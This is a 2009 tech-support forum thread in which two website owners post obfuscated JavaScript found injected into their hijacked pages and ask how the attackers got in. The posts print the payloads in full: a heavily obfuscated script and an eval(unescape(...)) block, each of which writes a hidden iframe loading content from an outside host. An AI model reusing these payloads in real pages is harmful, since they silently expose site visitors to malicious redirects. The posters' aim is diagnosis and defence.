Welcome to Tech Support Forum home to more then 136,000 problems solved. Issues have included: Spyware, Malware, Virus Issues, Windows, Microsoft, Linux, Networking, Security, Hardware, and Gaming Getting your problem solved is as easy as:
1. Registering for a free account
2. Asking your question
3. Receiving an answer

Registered members:
* Get free support
* Communicate privately with other members (PM).
* Removal of this message
* See fewer ads.
* And much more..

 


Want to know how to post a question? click here Having problems with spyware and pop-ups? First Steps
Go Back   Tech Support Forum > Security Center > General Computer Security
Reload this Page Websites Hijacked!
User Name
Password
Site Map Register Donate Rules Blogs Mark Forums Read


General Computer Security Get Help With System Security - This forum is not for malware removal assistance. For malware removal assistance, read the sticky topic at the top of the Virus/Trojan/Spyware Help forum, or the "First Steps" link at the top right of each page.

Reply
 
LinkBack Thread Tools
Old 05-18-2009, 08:08 AM   #1 (permalink)
Registered User
 
dj_kiwi's Avatar
 
Join Date: Apr 2008
Location: Swansea - South Wales
Posts: 189
OS: Vista Ultimate 32- WinXP Pro - Linux

My System

Send a message via MSN to dj_kiwi Send a message via Skype™ to dj_kiwi
Websites Hijacked!
Hi guys, hope you're well.. Ive just discovered that two websites im part of have been hijacked! looking at the html i found the following code was embedded into the html files! any idea on what kind of obfuscation this is?

Site1:
Code:
<!-- ad --><script>judps=(8356,"");rwyjp=(499.>=0.5e1?"t"+"":0x7);bjdup=(6.109e3<=32.?3.:"me"+" "+"s");fviuq=(6.928e3>0.80?"r"+"c="+"'h"+"":3.11e2);wvrjh=(0x556,"");fherp=(27,"'");krvgv=(.63,"w");wcdrg=(46.,"i");bvjmu=(.5>1067.?37.:"d");bqjnc=(4e0,"1 ");pqxpz=(404.>=0x12?"yle"+"":0.956);tegmj=(.8>=0.1?""+"="+"":1.1e1);oupnl=(5492<341?6286.:"");uaqun=(9.477e3,"");eygde=(5.89e2<6?0x977:": ");jloyr=(.6<=493?"d":2e0);bjqji=(929<=.419?8.:">");sksdb=(0x198>=4?"<":.6);kyrmd=(0.8>0x7?9144.:"/i");adeba=(759>=7664.?2.208e3:"");epetj=(1<9e0?703:0x1);insou=(6,5020);vwgfa=(0x5>=3.?48:9.1e1);kasqn=(7.89e2<452.?511:"");ctzhf=(8<4.?9:"");tmxca=(.66,"");smwzh=(.890,"t");njptt=(0x8<0.6865?1.:""+"t"+"");ewaeu=(800<88.?0x6828:"/");gbyqi=(0x8,"");ptlew=(8.68e2,""+"i"+"");qjljy=(5.7e1,""+"f"+"");jihph=(68.,614);ycheu=(0.755,"");yzdri=(486.<=7e0?8805.:"o");ecnhz=(0x4968,""+"o"+"."+"j"+"p"+"");vduwu=(5052,2);fzsmv=(1852.>=.2?9:0x6767);wcoex=(3329.,"");acaty=(945.,"v");qbgho=(9.8e1<8792?""+"s":0x6105);esxtd=(9.,"i");saujl=(.68,"b");kuavs=(3e0,"i");bwoee=(0x8270>0x129?"i":684);cefgr=(5615,"t"+"");ukqxz=(4e1,"y");cktrx=(9e0,979);owluc=((0x377>=.5?4.:90.)>=(0.6675,0x10)?(0x25<0.2562?.37:0x7):(0.99<3?"":6.454e3)+(9552<0x1?6.611e3:"w")+(6.,""));isqhu=((.9,627)>(3<62?0.1614:.2)?(1<=9180.?"r":.88):(.64>=6472?2.335e3:.27));tfgep=((545.<=565.?0x141:7.178e3)<=(0x528>2977?9.:45.)?(99.,4.28e2):(42.,"i"));meslx=((0x6854,8.),(74<.768?7.3e1:judps)+(0.312<4e0?rwyjp:2.9e2)+(3e0,""));hasfa=((6.88e2,0x43)<=(0x99>=.8036?0.240:360.)?(.161,0.92):(8e1<.510?7446:"<"+"if"+"r"+"a")+(696,bjdup)+(1e0,fviuq));amiin=((2.553e3,.6373),(.5,wvrjh)+(2.14e2<=97.?1:fherp)+(.58," ")+(51>4716.?7e0:krvgv)+(.947>=24.?7192:wcdrg)+(529>=0x3?bvjmu:.290)+(8e0<=2.?467:""));cwtlp=((828,0x93),(9,"t"+"=")+(0x977<7.?68:bqjnc)+(.9827,"st")+(5.9e1>=376.?2e1:pqxpz)+(0.041e3,tegmj)+(24<=0.463?.6719:oupnl));kqihk=((0x1638<=.790?5e0:4586),(5,uaqun)+(.3,eygde)+(812<0x220?.6592:"hi")+(609<=0x18?8.37e2:jloyr)+(.489<9?"d"+"":0.99)+(9707,"e")+(1.,""+"n"+"'"+"")+(2.183e3>3.2e1?bjqji:7.)+(.21,sksdb)+(0x7,kyrmd)+(4.66e2<4080?adeba:4021));xfrgd=((.6431<=2e0?epetj:721),(8e0>0x3?"fr":3.3e1)+(.13>0x27?.88:""+"am"+"e>")+(.13,""));wds=(((.99>=0x359?1816:.9670)<(6.95e2>37.?96:0.8)?(61,insou):(.8762>=66?.5894:0x9)),((26,vwgfa),(401,document)))[(((2>1.675e3?1255.:8e1)>(.3,0.2)?(0x1357>4580?.363:2.109e3):(5e0>.8?0.919e3:.3477))>((.5,9076)>(.39,0.6336)?(0.175<7?43.:1.):(.938,1.8e1))?((9.1e1,8.23e2)<(10,8.55e2)?(8.<=0.9?0x7743:6.):(.7,83.)):((3.12e2<3259?64.:6059)<(5.,2.11e2)?(4.8e1>.847?kasqn:4.062e3):(.27>7.9e1?97:.3883))+((.2,57.),(2<=2980?owluc:5.9e1))+((913>1.58e2?61.:.7)<(6>=3e0?0x807:0x8)?(8<=.4324?7.7e1:isqhu):(7>755?.80:1e0))+((8.<7442?.290:.8980),(0x6473,tfgep))+((417.>=0x2614?.991:6.64e2)>=(4<8e1?7.64e2:1189.)?(8e0,0.701):(.869<0x729?meslx:3.9e2))+((0.334,9806.)>(3>=3.69e3?7.54e2:.15)?(6e0,"e"):(.76<=3.37e2?7.961e3:7))+((2.3e2<530?0x4627:.80)<=(0x5031>3?775:.4516)?(602,172.):(9<=6.44e2?ctzhf:40.)+(1.171e3,""+"")))]((((.7691,574),(78,3.74e2))>((7.5e1>7730?6.1e1:0.8),(2.23e2,3e0))?((5.3e1>0x8839?175:9990),(5057.<9.?9.3e1:hasfa))+((4552,684.),(6.<=4.?1.:tmxca)+(5e0<=5?smwzh:0x103)+(0x3,njptt)+(0.18<21.?"p":749)+(14.,":")+(81.>=75.?"/":.8)+(.849,ewaeu)+(.313,""+"w"+"")+(2.,""+"w"+"")+(.9,"w")+(.1>1?.156:gbyqi))+((.65>=9e0?0x104:97.)>(4146.,4.34e2)?(.4670,0x4):(0x5,".")+(18.>0.49?""+"f"+"u"+"":1)+(9643,"j")+(0.473,ptlew)+(6,qjljy))+((2.549e3>445.?1e0:0x44)>(57>=.3?jihph:0.452e3)?(998.<=3?0x11:1e0):(9.001e3,ycheu)+(0.1527,yzdri)+(0x116,""+"r"+"k.c")+(0.575,ecnhz)+(4366.>=0x8?"/":8545))+((3.034e3,0x77)>(0x5,.7)?(916<1216?amiin:8e0):(188.,.3))+((0x697>=0.9?115:404)>=(0x63<.2846?.9135:4.78e2)?(9e0,1689.):(3420>=3?"":95)+(5>5.1e1?0.3:"t"+"h"+"="+"1"+" h"+"e"+"i"+"gh"+""))+((0.9,0.457)<(0.67,.3)?(23>.8093?vduwu:0.1):(2>822.?0x3:cwtlp))+((.4006>=0x11?23.:.4)<(3.47e3<=.8032?6.7e1:fzsmv)?(25,wcoex)+(4,"'")+(8.73e2<8.184e3?acaty:0x85)+(354>=9264?3.119e3:"i")+(977.,qbgho)+(0x2,esxtd)+(7.997e3<0.6?6:saujl)+(9.27e2,kuavs)+(26.>=0x8?"l":.3667)+(9.68e2,bwoee)+(0x8>3?cefgr:7)+(8,ukqxz)+(0.39,""):(0x3,cktrx))+((.12<=.8?0x370:1e1),(.7,kqihk))+((.89<9?0x88:.6588),(0.6e1>9.59e2?.105:xfrgd)):((.9>=775.?.708:0x615),(2.2e1<0x339?0.7903:8.12e3))));</script><!-- /ad -->
Site2:
Code:
<Script>
<!--
eval( unescape( "%69%66%28%21%6d%79%69%61%29%7b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%20%27%25%33%63%25%36%39%25%36%36%25%37%32%25%36%31%25%36%64%25%36%35%25%32%30%25%36%65%25%36%31%25%36%64%25%36%35%25%33%64%25%36%33%25%33%32%25%33%36%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%36%25%37%35%25%36%61%25%36%39%25%36%36%25%36%66%25%37%32%25%36%62%25%32%65%25%36%33%25%36%66%25%32%65%25%36%61%25%37%30%25%32%66%25%33%66%25%32%37%25%32%62%25%34%64%25%36%31%25%37%34%25%36%38%25%32%65%25%37%32%25%36%66%25%37%35%25%36%65%25%36%34%25%32%38%25%34%64%25%36%31%25%37%34%25%36%38%25%32%65%25%37%32%25%36%31%25%36%65%25%36%34%25%36%66%25%36%64%25%32%38%25%32%39%25%32%61%25%33%39%25%33%32%25%33%31%25%33%36%25%32%39%25%32%62%25%32%37%25%33%37%25%33%30%25%33%31%25%36%35%25%33%30%25%33%32%25%36%31%25%32%37%25%32%30%25%37%37%25%36%39%25%36%34%25%37%34%25%36%38%25%33%64%25%33%31%25%33%38%25%32%30%25%36%38%25%36%35%25%36%39%25%36%37%25%36%38%25%37%34%25%33%64%25%33%35%25%33%31%25%33%32%25%32%30%25%37%33%25%37%34%25%37%39%25%36%63%25%36%35%25%33%64%25%32%37%25%37%36%25%36%39%25%37%33%25%36%39%25%36%32%25%36%39%25%36%63%25%36%39%25%37%34%25%37%39%25%33%61%25%36%38%25%36%39%25%36%34%25%36%34%25%36%35%25%36%65%25%32%37%25%33%65%25%33%63%25%32%66%25%36%39%25%36%36%25%37%32%25%36%31%25%36%64%25%36%35%25%33%65%27%29%29%3b%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c266c98cc9;
//-->
</Script>
I'm more than interested in how to find out how they got in!!

Thanks


EDIT:

Ahh.. thanks to http://www.linkedresources.com/tools...er_v0.2b1.html

I can see what it was trying to redirect to!!
__________________
Life has changed.. for the better :)
Last edited by dj_kiwi; 05-18-2009 at 08:21 AM.
dj_kiwi is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Reddit!
Reply With Quote
Important Information
Join the #1 Tech Support Forum Today - It's Totally Free!

TechSupportForum.com is a leading support website for your computer needs. We offer free, friendly and personalized computer support. Why pay to have your computer fixed when you can do it for free.

Join TechSupportforum.com Today - Click Here

Old 07-27-2009, 02:48 PM   #2 (permalink)
Registered User
 
Join Date: Jul 2009
Posts: 1
OS: xp


Re: Websites Hijacked!
Did you find out how they got in?

I'm also getting attacked with the following code. They are putting this right after the body tag. This has happened to me before with another site and different type of code so I made sure my username and passwords are atleast 14 characters long upper/lower/symbols & special characters. I was also advised to secure my folders yet i'm still getting attacked.

Code:
<!-- ad -->
<script>judps=(8356,"");rwyjp=(499.>=0.5e1?"t"+"":0x7);bjdup=(6.109e3<=32.?3.:"me"+" "+"s");fviuq=(6.928e3>0.80?"r"+"c="+"'h"+"":3.11e2);wvrjh=(0x556,"");fherp=(27,"'");krvgv=(.63,"w");wcdrg=(46.,"i");bvjmu=(.5>1067.?37.:"d");bqjnc=(4e0,"1 ");pqxpz=(404.>=0x12?"yle"+"":0.956);tegmj=(.8>=0.1?""+"="+"":1.1e1);oupnl=(5492<341?6286.:"");uaqun=(9.477e3,"");eygde=(5.89e2<6?0x977:": ");jloyr=(.6<=493?"d":2e0);bjqji=(929<=.419?8.:">");sksdb=(0x198>=4?"<":.6);kyrmd=(0.8>0x7?9144.:"/i");adeba=(759>=7664.?2.208e3:"");epetj=(1<9e0?703:0x1);insou=(6,5020);vwgfa=(0x5>=3.?48:9.1e1);kasqn=(7.89e2<452.?511:"");ctzhf=(8<4.?9:"");tmxca=(.66,"");smwzh=(.890,"t");njptt=(0x8<0.6865?1.:""+"t"+"");ewaeu=(800<88.?0x6828:"/");gbyqi=(0x8,"");ptlew=(8.68e2,""+"i"+"");qjljy=(5.7e1,""+"f"+"");jihph=(68.,614);ycheu=(0.755,"");yzdri=(486.<=7e0?8805.:"o");ecnhz=(0x4968,""+"o"+"."+"j"+"p"+"");vduwu=(5052,2);fzsmv=(1852.>=.2?9:0x6767);wcoex=(3329.,"");acaty=(945.,"v");qbgho=(9.8e1<8792?""+"s":0x6105);esxtd=(9.,"i");saujl=(.68,"b");kuavs=(3e0,"i");bwoee=(0x8270>0x129?"i":684);cefgr=(5615,"t"+"");ukqxz=(4e1,"y");cktrx=(9e0,979);owluc=((0x377>=.5?4.:90.)>=(0.6675,0x10)?(0x25<0.2562?.37:0x7):(0.99<3?"":6.454e3)+(9552<0x1?6.611e3:"w")+(6.,""));isqhu=((.9,627)>(3<62?0.1614:.2)?(1<=9180.?"r":.88):(.64>=6472?2.335e3:.27));tfgep=((545.<=565.?0x141:7.178e3)<=(0x528>2977?9.:45.)?(99.,4.28e2):(42.,"i"));meslx=((0x6854,8.),(74<.768?7.3e1:judps)+(0.312<4e0?rwyjp:2.9e2)+(3e0,""));hasfa=((6.88e2,0x43)<=(0x99>=.8036?0.240:360.)?(.161,0.92):(8e1<.510?7446:"<"+"if"+"r"+"a")+(696,bjdup)+(1e0,fviuq));amiin=((2.553e3,.6373),(.5,wvrjh)+(2.14e2<=97.?1:fherp)+(.58," ")+(51>4716.?7e0:krvgv)+(.947>=24.?7192:wcdrg)+(529>=0x3?bvjmu:.290)+(8e0<=2.?467:""));cwtlp=((828,0x93),(9,"t"+"=")+(0x977<7.?68:bqjnc)+(.9827,"st")+(5.9e1>=376.?2e1:pqxpz)+(0.041e3,tegmj)+(24<=0.463?.6719:oupnl));kqihk=((0x1638<=.790?5e0:4586),(5,uaqun)+(.3,eygde)+(812<0x220?.6592:"hi")+(609<=0x18?8.37e2:jloyr)+(.489<9?"d"+"":0.99)+(9707,"e")+(1.,""+"n"+"'"+"")+(2.183e3>3.2e1?bjqji:7.)+(.21,sksdb)+(0x7,kyrmd)+(4.66e2<4080?adeba:4021));xfrgd=((.6431<=2e0?epetj:721),(8e0>0x3?"fr":3.3e1)+(.13>0x27?.88:""+"am"+"e>")+(.13,""));wds=(((.99>=0x359?1816:.9670)<(6.95e2>37.?96:0.8)?(61,insou):(.8762>=66?.5894:0x9)),((26,vwgfa),(401,document)))[(((2>1.675e3?1255.:8e1)>(.3,0.2)?(0x1357>4580?.363:2.109e3):(5e0>.8?0.919e3:.3477))>((.5,9076)>(.39,0.6336)?(0.175<7?43.:1.):(.938,1.8e1))?((9.1e1,8.23e2)<(10,8.55e2)?(8.<=0.9?0x7743:6.):(.7,83.)):((3.12e2<3259?64.:6059)<(5.,2.11e2)?(4.8e1>.847?kasqn:4.062e3):(.27>7.9e1?97:.3883))+((.2,57.),(2<=2980?owluc:5.9e1))+((913>1.58e2?61.:.7)<(6>=3e0?0x807:0x8)?(8<=.4324?7.7e1:isqhu):(7>755?.80:1e0))+((8.<7442?.290:.8980),(0x6473,tfgep))+((417.>=0x2614?.991:6.64e2)>=(4<8e1?7.64e2:1189.)?(8e0,0.701):(.869<0x729?meslx:3.9e2))+((0.334,9806.)>(3>=3.69e3?7.54e2:.15)?(6e0,"e"):(.76<=3.37e2?7.961e3:7))+((2.3e2<530?0x4627:.80)<=(0x5031>3?775:.4516)?(602,172.):(9<=6.44e2?ctzhf:40.)+(1.171e3,""+"")))]((((.7691,574),(78,3.74e2))>((7.5e1>7730?6.1e1:0.8),(2.23e2,3e0))?((5.3e1>0x8839?175:9990),(5057.<9.?9.3e1:hasfa))+((4552,684.),(6.<=4.?1.:tmxca)+(5e0<=5?smwzh:0x103)+(0x3,njptt)+(0.18<21.?"p":749)+(14.,":")+(81.>=75.?"/":.8)+(.849,ewaeu)+(.313,""+"w"+"")+(2.,""+"w"+"")+(.9,"w")+(.1>1?.156:gbyqi))+((.65>=9e0?0x104:97.)>(4146.,4.34e2)?(.4670,0x4):(0x5,".")+(18.>0.49?""+"f"+"u"+"":1)+(9643,"j")+(0.473,ptlew)+(6,qjljy))+((2.549e3>445.?1e0:0x44)>(57>=.3?jihph:0.452e3)?(998.<=3?0x11:1e0):(9.001e3,ycheu)+(0.1527,yzdri)+(0x116,""+"r"+"k.c")+(0.575,ecnhz)+(4366.>=0x8?"/":8545))+((3.034e3,0x77)>(0x5,.7)?(916<1216?amiin:8e0):(188.,.3))+((0x697>=0.9?115:404)>=(0x63<.2846?.9135:4.78e2)?(9e0,1689.):(3420>=3?"":95)+(5>5.1e1?0.3:"t"+"h"+"="+"1"+" h"+"e"+"i"+"gh"+""))+((0.9,0.457)<(0.67,.3)?(23>.8093?vduwu:0.1):(2>822.?0x3:cwtlp))+((.4006>=0x11?23.:.4)<(3.47e3<=.8032?6.7e1:fzsmv)?(25,wcoex)+(4,"'")+(8.73e2<8.184e3?acaty:0x85)+(354>=9264?3.119e3:"i")+(977.,qbgho)+(0x2,esxtd)+(7.997e3<0.6?6:saujl)+(9.27e2,kuavs)+(26.>=0x8?"l":.3667)+(9.68e2,bwoee)+(0x8>3?cefgr:7)+(8,ukqxz)+(0.39,""):(0x3,cktrx))+((.12<=.8?0x370:1e1),(.7,kqihk))+((.89<9?0x88:.6588),(0.6e1>9.59e2?.105:xfrgd)):((.9>=775.?.708:0x615),(2.2e1<0x339?0.7903:8.12e3))));</script><!-- /ad -->
mytoyo is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Reddit!
Reply With Quote
Reply

« Previous Thread | Next Thread »

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off



All times are GMT -7. The time now is 04:04 PM.

Contact Us - Tech Support Forum - Archive - Privacy Statement - Top


Copyright 2001 - 2009, Tech Support Forum
Home Tips Plus | Outdoor Basecamp | Automotive Support Forum

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85